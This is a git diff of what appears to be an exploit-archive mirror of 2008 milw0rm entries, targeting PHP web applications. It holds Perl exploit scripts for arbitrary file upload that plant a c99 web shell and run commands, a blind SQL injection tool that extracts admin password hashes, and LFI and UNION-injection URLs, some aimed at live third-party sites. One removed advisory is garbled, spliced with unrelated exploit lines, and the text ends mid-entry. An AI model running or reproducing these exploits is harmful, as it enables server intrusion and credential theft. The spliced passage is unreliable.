+			{
+
+			 $temp = "notes/" . $notefile;
+
+			 require($temp);
+
+123:			}
+x:  <...
+x: }}}
+
+exploit: GET /notes.php?mode=edit&id=[file]
+sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd
+
+live demo:
+http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php
+
+# milw0rm.com [2008-10-04]
diff --git a/platforms/php/webapps/6669.txt b/platforms/php/webapps/6669.txt
index 142ec39e1..9d8f9cb6a 100755
--- a/platforms/php/webapps/6669.txt
+++ b/platforms/php/webapps/6669.txt
@@ -1,34 +1,34 @@
-#################################################################################################
-[+] JMweb MP3 (src) Multiple Local File Inclusion
-[+] Discovered By SirGod
-[+] wWw.MorTal-TeaM.OrG
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
-##################################################################################################
-
-# Script Homepage:
-# http://www.jesse-web.co.cc //
-
-[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip
-
-[+] Local File Inclusion
-
-     Example  1 :
-
-       http://[target]/[path]/listen.php?src=[Local File]%00
-
-     PoC 1 :
-
-       http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00
-
-
-    Example 2 :
-
-       http://[target]/[path]/download.php?src=[Local File]%00
-
-    PoC 2 :
-
-      http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00
-
-##################################################################################################
-
-# milw0rm.com [2008-10-04]
+#################################################################################################
+[+] JMweb MP3 (src) Multiple Local File Inclusion
+[+] Discovered By SirGod
+[+] wWw.MorTal-TeaM.OrG
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
+##################################################################################################
+
+# Script Homepage:
+# http://www.jesse-web.co.cc //
+
+[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip
+
+[+] Local File Inclusion
+
+     Example  1 :
+
+       http://[target]/[path]/listen.php?src=[Local File]%00
+
+     PoC 1 :
+
+       http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00
+
+
+    Example 2 :
+
+       http://[target]/[path]/download.php?src=[Local File]%00
+
+    PoC 2 :
+
+      http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00
+
+##################################################################################################
+
+# milw0rm.com [2008-10-04]
diff --git a/platforms/php/webapps/6670.txt b/platforms/php/webapps/6670.txt
index 1e087666b..53c401bab 100755
--- a/platforms/php/webapps/6670.txt
+++ b/platforms/php/webapps/6670.txt
@@ -1,78 +1,78 @@
-#! /usr/bin/perl
-
-# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-# FOSS Gallery Admin Version <= 1.0 / Remote Arbitrary Upload Vulnerability
-# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-# Program: FOSS Gallery Admin Version
-# Version: <= 1.0
-# File affected: processFiles.php
-# Download: http://sourceforge.net/projects/fossgallery/
-#
-#
-# Found by Pepelux 
-# eNYe-Sec - www.enye-sec.org
-#
-# Upload images is only allowed to the admin but the process to upload has
-# 3 steps (with 3 pages). only the first page check the user permissions.
-#
-# STEPS:
-# uploadForm1.php -> ask for the number of files you wish to upload
-# uploadForm2.php -> ask for the files to upload
-# processFiles.php -> process the file(s)
-#
-# Also image format is not validated and you can upload any file.
-#
-# You can POST directly in the 3th step (processFiles.php):
-# - uploadNeed = 1 ... we only need to upload 1 file
-# - uploadFile0 = shell.php ... the file to upload
-
-
-
-use LWP::UserAgent;
-use HTTP::Request::Common;
-use HTTP::Headers;
-
-my ($host, $file) = @ARGV ;
-
-
-
-unless($ARGV[1]){
-
-	print "\nUsage: perl $0  \n";
-
-	print "\tex: perl $0 http://localhost shell.php\n\n";
-
-	exit 1;
-
-}
-
-
-$host = 'http://'.$host if ($host !~ /^http:/);
-
-$host .= "/" if ($host !~ /\/\$/);
-
-
-my $ua = LWP::UserAgent->new();
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
-
-$ua->timeout(10);
-
-my $request = HTTP::Request->new();
-my $response;
-my $header;
-my $url = $host."processFiles.php";
-
-$response = $ua->request(POST $url, Content_Type => 'form-data',
-					Content => [ uploadNeed => "1", uploadFile0 => [$file]]);
-
-$content = $response->content;
-
-
-
-if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully. File located in:\n".$host.$file."\n"; }
-else { print "\nExploit failed\n"; }
-
-
-exit;
-
-# milw0rm.com [2008-10-04]
+#! /usr/bin/perl
+
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+# FOSS Gallery Admin Version <= 1.0 / Remote Arbitrary Upload Vulnerability
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+# Program: FOSS Gallery Admin Version
+# Version: <= 1.0
+# File affected: processFiles.php
+# Download: http://sourceforge.net/projects/fossgallery/
+#
+#
+# Found by Pepelux 
+# eNYe-Sec - www.enye-sec.org
+#
+# Upload images is only allowed to the admin but the process to upload has
+# 3 steps (with 3 pages). only the first page check the user permissions.
+#
+# STEPS:
+# uploadForm1.php -> ask for the number of files you wish to upload
+# uploadForm2.php -> ask for the files to upload
+# processFiles.php -> process the file(s)
+#
+# Also image format is not validated and you can upload any file.
+#
+# You can POST directly in the 3th step (processFiles.php):
+# - uploadNeed = 1 ... we only need to upload 1 file
+# - uploadFile0 = shell.php ... the file to upload
+
+
+
+use LWP::UserAgent;
+use HTTP::Request::Common;
+use HTTP::Headers;
+
+my ($host, $file) = @ARGV ;
+
+
+
+unless($ARGV[1]){
+
+	print "\nUsage: perl $0  \n";
+
+	print "\tex: perl $0 http://localhost shell.php\n\n";
+
+	exit 1;
+
+}
+
+
+$host = 'http://'.$host if ($host !~ /^http:/);
+
+$host .= "/" if ($host !~ /\/\$/);
+
+
+my $ua = LWP::UserAgent->new();
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
+
+$ua->timeout(10);
+
+my $request = HTTP::Request->new();
+my $response;
+my $header;
+my $url = $host."processFiles.php";
+
+$response = $ua->request(POST $url, Content_Type => 'form-data',
+					Content => [ uploadNeed => "1", uploadFile0 => [$file]]);
+
+$content = $response->content;
+
+
+
+if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully. File located in:\n".$host.$file."\n"; }
+else { print "\nExploit failed\n"; }
+
+
+exit;
+
+# milw0rm.com [2008-10-04]
diff --git a/platforms/php/webapps/6674.pl b/platforms/php/webapps/6674.pl
index 0d110325d..56853fb67 100755
--- a/platforms/php/webapps/6674.pl
+++ b/platforms/php/webapps/6674.pl
@@ -1,130 +1,130 @@
-# FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit
-# url: http://downloads.sourceforge.net/fossgallery/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# OUTPUT:
-#
-# Exploited sucessfully.
-#
-# [+] Info:
-#    Linux h4x0rz 2.6.18-6-686 #1 SMP Mon Aug 18 08:42:39 UTC 2008 i686
-#    uid=33(www-data) gid=33(www-data) groups=33(www-data)
-#    Safe Mode: OFF (not secure)
-#
-# joss@h4x0rz:~/Desktop$
-
-
-use LWP::UserAgent;
-use HTTP::Request::Common;
-use HTTP::Headers;
-use LWP::UserAgent;
-use HTTP::Request;
-use LWP::Simple;
-
-sub lw
-{
-
-my $SO = $^O;
-my $linux = "";
-if (index(lc($SO),"win")!=-1){
-		   $linux="0";
-	    }else{
-		    $linux="1";
-	    }
-		if($linux){
-system("clear");
-}
-else{
-system("cls");
-}
-}
-
-my ($host, $file) = @ARGV ;
-
-if (!$ARGV[0]) {
-
-&lw;
-print "\n[x] FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit\n";
-print "[x] written by JosS - sys-project[at]hotmail.com\n";
-print "[x] http://www.spanish-hackers.com/\n\n";
-print "Usage: $0 [host] [file] \n";
-print "if doesn't exist the file: file default is phpshell C99\n\n";
-exit;
-}
-if (!$ARGV[1])
-{
-$file="c99.php";
-}
-
-&lw;
-
-$host = 'http://'.$host if ($host !~ /^http:/);
-$host .= "/" if ($host !~ /\/\$/);
-
-my $ua = LWP::UserAgent->new();
-$ua->timeout(12);
-my $request = HTTP::Request->new();
-my $response;
-my $header;
-my $url = $host."processFiles.php";
-
-$response = $ua->request(POST $url, Content_Type => 'form-data',
-					Content => [ uploadNeed => "1", uploadFile0 => [$file]]);
-$content = $response->content;
-
-if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; }
-else { print "\nExploit failed\n"; exit;}
-
-my $c99="c99.php"; 
-chomp ($c99);
-
-if ($file =~ /c99.php/)
-{
-
-$comando="?act=cmd&d=/&cmd=/&cmd_txt=1&submit=Execute";
-
-print "\n";
-
-
-my $final = $host.$c99.$comando;
-
-my $ua = LWP::UserAgent->new;
-
-my $req = HTTP::Request->new(GET => $final);
-
-$ua->timeout(10);
-
-$doc = $ua->request($req)->as_string;
-
-
-
-$kernel = $1 if ( $doc =~ m/-a:  (.*?)\<\/b>/mosix);
-$id = $1 if ( $doc =~ m/uid (.*?)\<\/b>/mosix);
-
-$safe = $1 if ( $doc =~ m/color=green> (.*?)\<\/font>/mosix);
-
-
-
-print "[+] Info:\n";
-
-print "    $kernel\n";
-print "    uid$id\n";
-
-print "    Safe Mode: $safe\n";
-
-print "\n";
-
-
-
-}
-
-__EOF__
-
-# milw0rm.com [2008-10-05]
+# FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit
+# url: http://downloads.sourceforge.net/fossgallery/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# OUTPUT:
+#
+# Exploited sucessfully.
+#
+# [+] Info:
+#    Linux h4x0rz 2.6.18-6-686 #1 SMP Mon Aug 18 08:42:39 UTC 2008 i686
+#    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+#    Safe Mode: OFF (not secure)
+#
+# joss@h4x0rz:~/Desktop$
+
+
+use LWP::UserAgent;
+use HTTP::Request::Common;
+use HTTP::Headers;
+use LWP::UserAgent;
+use HTTP::Request;
+use LWP::Simple;
+
+sub lw
+{
+
+my $SO = $^O;
+my $linux = "";
+if (index(lc($SO),"win")!=-1){
+		   $linux="0";
+	    }else{
+		    $linux="1";
+	    }
+		if($linux){
+system("clear");
+}
+else{
+system("cls");
+}
+}
+
+my ($host, $file) = @ARGV ;
+
+if (!$ARGV[0]) {
+
+&lw;
+print "\n[x] FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit\n";
+print "[x] written by JosS - sys-project[at]hotmail.com\n";
+print "[x] http://www.spanish-hackers.com/\n\n";
+print "Usage: $0 [host] [file] \n";
+print "if doesn't exist the file: file default is phpshell C99\n\n";
+exit;
+}
+if (!$ARGV[1])
+{
+$file="c99.php";
+}
+
+&lw;
+
+$host = 'http://'.$host if ($host !~ /^http:/);
+$host .= "/" if ($host !~ /\/\$/);
+
+my $ua = LWP::UserAgent->new();
+$ua->timeout(12);
+my $request = HTTP::Request->new();
+my $response;
+my $header;
+my $url = $host."processFiles.php";
+
+$response = $ua->request(POST $url, Content_Type => 'form-data',
+					Content => [ uploadNeed => "1", uploadFile0 => [$file]]);
+$content = $response->content;
+
+if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; }
+else { print "\nExploit failed\n"; exit;}
+
+my $c99="c99.php"; 
+chomp ($c99);
+
+if ($file =~ /c99.php/)
+{
+
+$comando="?act=cmd&d=/&cmd=/&cmd_txt=1&submit=Execute";
+
+print "\n";
+
+
+my $final = $host.$c99.$comando;
+
+my $ua = LWP::UserAgent->new;
+
+my $req = HTTP::Request->new(GET => $final);
+
+$ua->timeout(10);
+
+$doc = $ua->request($req)->as_string;
+
+
+
+$kernel = $1 if ( $doc =~ m/-a:  (.*?)\<\/b>/mosix);
+$id = $1 if ( $doc =~ m/uid (.*?)\<\/b>/mosix);
+
+$safe = $1 if ( $doc =~ m/color=green> (.*?)\<\/font>/mosix);
+
+
+
+print "[+] Info:\n";
+
+print "    $kernel\n";
+print "    uid$id\n";
+
+print "    Safe Mode: $safe\n";
+
+print "\n";
+
+
+
+}
+
+__EOF__
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6675.pl b/platforms/php/webapps/6675.pl
index 1c1bc7718..d824091ec 100755
--- a/platforms/php/webapps/6675.pl
+++ b/platforms/php/webapps/6675.pl
@@ -1,150 +1,150 @@
-#!/usr/bin/perl
-#####################################################################################
-#
-#    Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection
-#
-#    found by: J0hn.X3r
-#    exploit written by: J0hn.X3r and electron1x
-#    Date:     05.10.2008
-#    Dork: "Galerie 3.2 © 2004 by progressive"
-#
-#    Contact:
-#       J0hn.X3r
-#            [+] ICQ:   573813
-#            [+] Mail:  J0hn.X3r[at]gmail.com
-#       electron1x
-#            [+] Mail:  electron1x *at* mail *dot* ru
-#
-#    Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor
-#               Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW,
-#               Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-)
-#
-#####################################################################################
-#
-#  First, Galerie 3.2 is an addon for Burning Board Lite.
-#
-#  http://www.site.com/galerie.php?action=show&pic=10
-#
-#  If we add a ' to the pic id we get an SQL Error. But the Query is an UPDATE Query, so we can't use UNION.
-#
-#  We have to try it with a Blind SQL Injection.
-#  ( that slow and shitty subquery thingy ;) )
-#
-#  injection:
-#  http://www.site.com/galerie.php?action=show&pic=10'/**/and/**/ascii(substring((SELECT/**/password/**/from/**/bb1_users/**/WHERE/**/userid=1),1,1))>1/*
-#
-#####################################################################################
-
-use strict;
-use warnings;
-use LWP::UserAgent;
-
-banner();
-
-my $url = shift || usage($0);
-my $usr_id  = shift;
-my $keyspace = "0123456789abcdef";
-
-$usr_id = 1 unless ( $usr_id and $usr_id =~ /^\d+$/ );
-$url    = 'http://' . $url unless ( $url =~ /^https?:\/\/.+?\/$/ );
-
-
-# global vars...
-our @url          = ( "$url/galerie.php?action=show&pic={id}%27+and+ascii(substring((SELECT+password+from+bb2_users+where+userid=$usr_id),1,1))", '', '/*' );
-our $ua           = LWP::UserAgent->new;
-$ua->agent('Mozilla/4.8 [en] (Windows NT 6.0; U)'); # btw we dont use windows ..
-
-# regexes..
-our $regex        = 'Bild\ \d+\ von\ (\d+)';
-my  $prefix_regex = '(\w+)_galeriedata';
-my  $regex_id     = 'pic=(\d+)';
-
-my  $prefix       = '';
-my  $pic_id       = '';
-
-print "[~] Preparing attack...\n";
-my $r = $ua->get($url . "/galerie.php?action=show&pic=%27");
-        die   "\t[!!] Couldnt connect to $url!\n"             unless ( $r->is_success );
-        die   "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /$prefix_regex/ );
-        print "\t[*] Target seems to be vulnerable\n";
-        $prefix = $1;
-        $url[0] =~ s/bb2/$prefix/;
-
-$r    = $ua->get($url . "/galerie.php");
-        die   "\t[!!] Couldnt get a valid pic-id\n" unless ( $r->content =~ /$regex_id/ );
-        $pic_id = $1;
-        $url[0] =~ s/{id}/$pic_id/;
-
-        print "\t[*] Using table prefix $prefix\n";
-        print "\t[*] Using pic-id $pic_id\n";
-
-
-print "[~] Unleashing Black Magic...\n";
-        print STDERR "\t[*] Getting Hash "; 
-                                           
-
-for ( 1..32 ) {
-        $url[0] =~ s/\),\d{1,2},/\),$_,/;
-        blind( build_array($keyspace), 0, 16);
-}
-print "\n";
-
-
-
-sub banner
-{
-        print "[~] Galerie 3.2 WBB Lite Addon Blind SQL-Injection Exploit\n";
-        print "[~] Written by J0hn.x3r and electron1x\n\n"
-}
-
-sub usage
-{
-        my $script = shift;
-        print "[*] Usage\n" ,
-                        "\t$script  \n" ,
-                        "\tuser id defaults to 1\n" ,
-              "[*] Examples\n" ,
-                        "\t$script http://example.com/forum/ 2\n" ,
-                        "\t$script localhost/board/\n" ,
-                        "\t$script localhost 31337\n";
-        exit(0);
-}
-
-
-
-sub blind
-{
-        my ( $keyspace,  $bottom, $top ) = @_;
-        my $center = int ($bottom+$top)/2;
-        print STDERR chr $$keyspace[$center];
-        if ( request($$keyspace[$center], '=')) {
-                return;
-        } elsif ( $top-$bottom > 0) {
-                        print STDERR "\b";
-                        return blind($keyspace, $center+1, $top   )
-                                unless  (  request($$keyspace[$center], '<') );
-                        return blind($keyspace, $bottom, $center-1);
-        } else {
-                print STDERR "\n[!!] Something went wront, dunno what..\n";
-                exit(1);
-        }
-}
-
-sub build_array
-{
-        my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g;
-        return \@sorted;
-}
-
-
-sub request
-{
-        my ( $key, $flag ) = @_;
-        my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
-        $r->content =~ /$regex/;
-        return ($1 > 0);
-}
-
-__END__
-
-# milw0rm.com [2008-10-05]
+#!/usr/bin/perl
+#####################################################################################
+#
+#    Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection
+#
+#    found by: J0hn.X3r
+#    exploit written by: J0hn.X3r and electron1x
+#    Date:     05.10.2008
+#    Dork: "Galerie 3.2 © 2004 by progressive"
+#
+#    Contact:
+#       J0hn.X3r
+#            [+] ICQ:   573813
+#            [+] Mail:  J0hn.X3r[at]gmail.com
+#       electron1x
+#            [+] Mail:  electron1x *at* mail *dot* ru
+#
+#    Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor
+#               Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW,
+#               Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-)
+#
+#####################################################################################
+#
+#  First, Galerie 3.2 is an addon for Burning Board Lite.
+#
+#  http://www.site.com/galerie.php?action=show&pic=10
+#
+#  If we add a ' to the pic id we get an SQL Error. But the Query is an UPDATE Query, so we can't use UNION.
+#
+#  We have to try it with a Blind SQL Injection.
+#  ( that slow and shitty subquery thingy ;) )
+#
+#  injection:
+#  http://www.site.com/galerie.php?action=show&pic=10'/**/and/**/ascii(substring((SELECT/**/password/**/from/**/bb1_users/**/WHERE/**/userid=1),1,1))>1/*
+#
+#####################################################################################
+
+use strict;
+use warnings;
+use LWP::UserAgent;
+
+banner();
+
+my $url = shift || usage($0);
+my $usr_id  = shift;
+my $keyspace = "0123456789abcdef";
+
+$usr_id = 1 unless ( $usr_id and $usr_id =~ /^\d+$/ );
+$url    = 'http://' . $url unless ( $url =~ /^https?:\/\/.+?\/$/ );
+
+
+# global vars...
+our @url          = ( "$url/galerie.php?action=show&pic={id}%27+and+ascii(substring((SELECT+password+from+bb2_users+where+userid=$usr_id),1,1))", '', '/*' );
+our $ua           = LWP::UserAgent->new;
+$ua->agent('Mozilla/4.8 [en] (Windows NT 6.0; U)'); # btw we dont use windows ..
+
+# regexes..
+our $regex        = 'Bild\ \d+\ von\ (\d+)';
+my  $prefix_regex = '(\w+)_galeriedata';
+my  $regex_id     = 'pic=(\d+)';
+
+my  $prefix       = '';
+my  $pic_id       = '';
+
+print "[~] Preparing attack...\n";
+my $r = $ua->get($url . "/galerie.php?action=show&pic=%27");
+        die   "\t[!!] Couldnt connect to $url!\n"             unless ( $r->is_success );
+        die   "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /$prefix_regex/ );
+        print "\t[*] Target seems to be vulnerable\n";
+        $prefix = $1;
+        $url[0] =~ s/bb2/$prefix/;
+
+$r    = $ua->get($url . "/galerie.php");
+        die   "\t[!!] Couldnt get a valid pic-id\n" unless ( $r->content =~ /$regex_id/ );
+        $pic_id = $1;
+        $url[0] =~ s/{id}/$pic_id/;
+
+        print "\t[*] Using table prefix $prefix\n";
+        print "\t[*] Using pic-id $pic_id\n";
+
+
+print "[~] Unleashing Black Magic...\n";
+        print STDERR "\t[*] Getting Hash "; 
+                                           
+
+for ( 1..32 ) {
+        $url[0] =~ s/\),\d{1,2},/\),$_,/;
+        blind( build_array($keyspace), 0, 16);
+}
+print "\n";
+
+
+
+sub banner
+{
+        print "[~] Galerie 3.2 WBB Lite Addon Blind SQL-Injection Exploit\n";
+        print "[~] Written by J0hn.x3r and electron1x\n\n"
+}
+
+sub usage
+{
+        my $script = shift;
+        print "[*] Usage\n" ,
+                        "\t$script  \n" ,
+                        "\tuser id defaults to 1\n" ,
+              "[*] Examples\n" ,
+                        "\t$script http://example.com/forum/ 2\n" ,
+                        "\t$script localhost/board/\n" ,
+                        "\t$script localhost 31337\n";
+        exit(0);
+}
+
+
+
+sub blind
+{
+        my ( $keyspace,  $bottom, $top ) = @_;
+        my $center = int ($bottom+$top)/2;
+        print STDERR chr $$keyspace[$center];
+        if ( request($$keyspace[$center], '=')) {
+                return;
+        } elsif ( $top-$bottom > 0) {
+                        print STDERR "\b";
+                        return blind($keyspace, $center+1, $top   )
+                                unless  (  request($$keyspace[$center], '<') );
+                        return blind($keyspace, $bottom, $center-1);
+        } else {
+                print STDERR "\n[!!] Something went wront, dunno what..\n";
+                exit(1);
+        }
+}
+
+sub build_array
+{
+        my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g;
+        return \@sorted;
+}
+
+
+sub request
+{
+        my ( $key, $flag ) = @_;
+        my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
+        $r->content =~ /$regex/;
+        return ($1 > 0);
+}
+
+__END__
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6676.txt b/platforms/php/webapps/6676.txt
index e727bd297..80ac65667 100755
--- a/platforms/php/webapps/6676.txt
+++ b/platforms/php/webapps/6676.txt
@@ -1,194 +1,194 @@
-OpenNMS Multiple Vulnerabilities
---------------------------------
-
-BugSec | Security Advisory
-Moshe Ben-Abu | Security Expert
-
-
-Advisory URL (PDF):
-http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf
- 
-
-Vendor
-------
-OpenNMS Group – http://www.opennms.com
-OpenNMS Project – http://www.opennms.org
-
-Application Description
------------------------
-“OpenNMS is the world's first enterprise grade network management
-platform developed under the open source model. It
-consists of a community supported open-source project as well as a
-commercial services, training, and support
-organization. - From OpenNMS Project website.
-
-
-OpenNMS HTTP Response Splitting Vulnerability
----------------------------------------------
-
-Vulnerability Information
--------------------------
-Remotely exploitable: Yes
-Locally exploitable: No
-Affected versions:
-OpenNMS 1.5.93-1
-Other versions may also be affected.
-
-Vulnerability Details
----------------------
-An input validation problem exists within OpenNMS which allows injecting
-CR (carriage return - %0D or \r) and LF
-(line feed - %0A or \n) characters into the server HTTP response header,
-resulting in a HTTP Response Splitting[1]
-vulnerability.
-This vulnerability is possible because the application fails to validate
-user supplied input, returning it
-un-sanitized within the server HTTP response header back to the client.
-This vulnerability not only gives attackers control of the remaining
-headers and body of the server response, but
-also allows them to create additional responses entirely under their
-control.
-Attacker-supplied HTML or JavaScript code could run in the context of
-the affected site, potentially allowing an
-attacker to steal cookie-based authentication credentials, control how
-the site is rendered to the user, and
-influence or misrepresent how web content is served, cached, or
-interpreted. Other attacks are also possible.
-
-
-
-
-
-
-Proof-of-Concept
-----------------
-
-Header injection:
-http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec
-
-Server response:
-HTTP/1.1 302 Moved Temporarily
-Date: Thu, 25 Sep 2008 11:30:05 GMT
-Server: Apache/2.2.3
-Location: http://server/opennms/event/list?
-InjectedHeader: BugSec=
-Content-Length: 0
-Connection: close
-Content-Type: text/plain; charset=UTF-8
-
-
-HTTP Response Splitting:
-http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text
-/html%0D%0AContent-Length:%2036%0D%0A%0D%0ABugSec INCLUDE
-
-exploit: 
-javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/";
-
-Ingenious work :D
-
-# milw0rm.com [2008-10-05]
+# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability
+# url: http://sourceforge.net/projects/phpabook/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# *Requirements: magic_quotes_gpc = Off
+
+vuln file: include/config.inc.php
+vuln code:
+
+x:  >...
+61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") {
+	$userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]);
+	$userName = $userArray[0];
+	$userID = $userArray[1];
+	$userLang = $userArray[2];
+	include("include/lang/$userLang/inc.messages.php");
+67:	}
+x:  <...
+
+Proof of Concept (function 'explode' PHP):
+[0] = JosS;
+[1] = JosS;
+[2] = ../../../../etc/passwd%00; ---> INCLUDE
+
+exploit: 
+javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/";
+
+Ingenious work :D
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6680.txt b/platforms/php/webapps/6680.txt
index 186d10d1e..ece2641f6 100755
--- a/platforms/php/webapps/6680.txt
+++ b/platforms/php/webapps/6680.txt
@@ -1,20 +1,20 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-FOSS Gallery Public Version <= 1.0 / Arbitrary file upload Vulnerabilities
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-Program: FOSS Gallery Public Version
-Version: <= 1.0
-File affected: processFiles.php
-Download: http://sourceforge.net/projects/fossgallery/
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
--- Bug --
-Website doesn't check the images format and you can upload PHP files.
-
--- Exploit --
-http://localhost/shell.php
-
-# milw0rm.com [2008-10-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+FOSS Gallery Public Version <= 1.0 / Arbitrary file upload Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Program: FOSS Gallery Public Version
+Version: <= 1.0
+File affected: processFiles.php
+Download: http://sourceforge.net/projects/fossgallery/
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+-- Bug --
+Website doesn't check the images format and you can upload PHP files.
+
+-- Exploit --
+http://localhost/shell.php
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6681.txt b/platforms/php/webapps/6681.txt
index 8924b69ef..4a58a80ed 100755
--- a/platforms/php/webapps/6681.txt
+++ b/platforms/php/webapps/6681.txt
@@ -1,40 +1,40 @@
-########################################################
-PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability
-########################################################
-
-++++++++++++++++++++++++++++
-Author :         boom3rang
-webpage :    www.khg-crew.ws
-greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-]
-++++++++++++++++++++++++++++
-
-
-[+] Dork:      infusions/manuals/manuals.php?manual=
-
-[+] Example:         http://localhost/infusions/manuals/manuals.php?manual=[ exploit ]
-
-[+] Exploit
---------------------------------
-username:
-http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
-
-password: 
-http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
-
-email:
-http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
---------------------------------
-
-
-[+] liveDEMO: 
-
-http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
-http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
-http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
-============================
-+Proud 2 be Albanian
-+Proud 2 be Muslim
-+United States of Albania
-============================
-
-# milw0rm.com [2008-10-05]
+########################################################
+PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability
+########################################################
+
+++++++++++++++++++++++++++++
+Author :         boom3rang
+webpage :    www.khg-crew.ws
+greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-]
+++++++++++++++++++++++++++++
+
+
+[+] Dork:      infusions/manuals/manuals.php?manual=
+
+[+] Example:         http://localhost/infusions/manuals/manuals.php?manual=[ exploit ]
+
+[+] Exploit
+--------------------------------
+username:
